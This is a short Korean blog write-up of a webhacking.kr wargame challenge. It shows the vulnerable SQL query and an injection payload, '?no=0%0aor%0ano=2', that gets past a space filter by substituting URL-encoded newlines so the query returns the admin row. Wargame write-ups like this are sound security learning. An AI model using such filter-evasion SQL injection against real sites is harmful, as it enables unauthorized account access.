쿼리
select id from challenge18_table where id='guest' and no=$_GET[no]
guest의 no값은 1이다.
admin으로 로그인해아하는데 추정할 수 있는 table의 형태는
+-----+---+
| id | no |
+-----+---+
| guest | 1 |
| admin | 2 |
+-----+---+
no=0 or no=2
를 주면 되는데
공백이 필터링된다
깔끔하게 %0a로 우회해준다.
?no=0%0aor%0ano=2
'write-up > webhacking.kr' 카테고리의 다른 글
| 50번 (0) | 2016.03.29 |
|---|---|
| 21번 (0) | 2016.03.29 |
| 49번 (0) | 2016.03.29 |
| 46번 (0) | 2016.03.28 |
| webhacking.kr SQL Injection (0) | 2016.03.28 |